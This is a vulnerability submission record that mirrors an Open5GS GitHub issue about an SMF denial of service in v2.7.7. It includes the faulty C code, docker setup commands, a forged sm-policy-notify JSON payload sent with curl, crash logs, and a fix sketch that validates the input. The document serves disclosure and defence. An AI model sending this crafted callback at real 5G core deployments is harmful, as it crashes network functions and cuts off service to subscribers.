| Title | Open5gs SMF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose `pccRules[*].flowInfos[*]` object omits `flowDescription`.
The OpenAPI parser allows `flowDescription` to be absent:
```c
flow_description = cJSON_GetObjectItemCaseSensitive(flow_informationJSON, "flowDescription");
...
flow_information_local_var = OpenAPI_flow_information_create(
    flow_description && !cJSON_IsNull(flow_description)
        ? ogs_strdup(flow_description->valuestring) : NULL,
    ...
);
```
But the SMF callback handler unconditionally duplicates that pointer:
```c
flow->description = ogs_strdup(FlowInformation->flow_description);
ogs_assert(flow->description);
```
So a single callback with `flowDirection` but no `flowDescription` hits
`ogs_talloc_strdup` on `NULL`, then aborts the SMF process.
This path requires an existing SMF session, so the live reproduction below first
established a real UE PDU session using UERANSIM.
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
--network open5gs --network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
--network open5gs --network-alias ue.ueransim.org \
--cap-add NET_ADMIN --privileged \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this live run):
```bash
payload=$(python3 - <<'PY'
import json
body={
  "smPolicyDecision":{
    "pccRules":{
      "r1":{
        "pccRuleId":"r1",
        "refQosData":["q1"],
        "precedence":1,
        "flowInfos":[{"flowDirection":"UPLINK"}]
      }
    },
    "qosDecs":{
      "q1":{"qosId":"q1","5qi":1,"priorityLevel":1}
    }
  }
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.13/nsmf-callback/v1/sm-policy-notify/1/update \
-H 'content-type: application/json' \
--data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T19:02:30Z smf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T19:02:42.968422154Z
04/10 19:02:42.852: [core] ERROR: ogs_talloc_strdup: Expectation `ptr' failed. (../lib/core/ogs-strings.c:157)
04/10 19:02:42.852: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `flow->description' failed. (../src/smf/npcf-handler.c:212)
```
### Expected behaviour
SMF should reject malformed `flowInfos` input with a normal HTTP error response.
### Observed Behaviour
The callback resets the connection and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7 |
|---|
| Source | https://github.com/open5gs/open5gs/issues/4443 |
|---|
| User | LinZiyu (UID 94035) |
|---|
| Submitted | 20/04/2026 20:57 (1 month ago) |
|---|
| Moderation | 10/05/2026 16:40 (20 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 362546 [Open5GS up to 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos denial of service] |
|---|
| Points | 20 |
|---|
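
The expected behaviour in the description (reject a `flowInfos` entry that lacks `flowDescription` with an HTTP error instead of asserting) can be sketched as follows. This is an added example, not Open5GS code: `flow_info_t`, `smf_flow_t`, `copy_flow_info`, `apply_flow_infos` and the status constants are hypothetical stand-ins for the parsed OpenAPI object and the SMF handler, and the return value models the HTTP status the handler would send.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-ins: the parser leaves flow_description NULL
 * when the JSON key is absent, as the description explains. */
typedef struct { const char *flow_description; const char *flow_direction; } flow_info_t;
typedef struct { char *description; } smf_flow_t;
enum { FLOW_OK = 0, FLOW_BAD_REQUEST = 400, FLOW_NO_MEMORY = 500 };

/* Copy one entry; peer-controlled input is checked, never asserted on. */
int copy_flow_info(const flow_info_t *in, smf_flow_t *out)
{
    if (!in || !out || !in->flow_description)
        return FLOW_BAD_REQUEST;
    size_t n = strlen(in->flow_description) + 1;
    out->description = malloc(n);
    if (!out->description)
        return FLOW_NO_MEMORY;
    memcpy(out->description, in->flow_description, n);
    return FLOW_OK;
}

/* Validate every entry before committing any of them, so a malformed
 * rule is rejected without leaving partially updated session state. */
int apply_flow_infos(const flow_info_t *in, size_t count, smf_flow_t *out)
{
    for (size_t i = 0; i < count; i++)
        if (!in[i].flow_description)
            return FLOW_BAD_REQUEST;
    for (size_t i = 0; i < count; i++) {
        int rc = copy_flow_info(&in[i], &out[i]);
        if (rc != FLOW_OK) {
            while (i--) {               /* roll back entries already copied */
                free(out[i].description);
                out[i].description = NULL;
            }
            return rc;
        }
    }
    return FLOW_OK;
}

int main(void)
{
    /* Constructed input mirroring the report: flowDirection only. */
    flow_info_t in[1] = { { NULL, "UPLINK" } };
    smf_flow_t out[1] = { { NULL } };
    printf("status=%d\n", apply_flow_infos(in, 1, out));
    return 0;
}
```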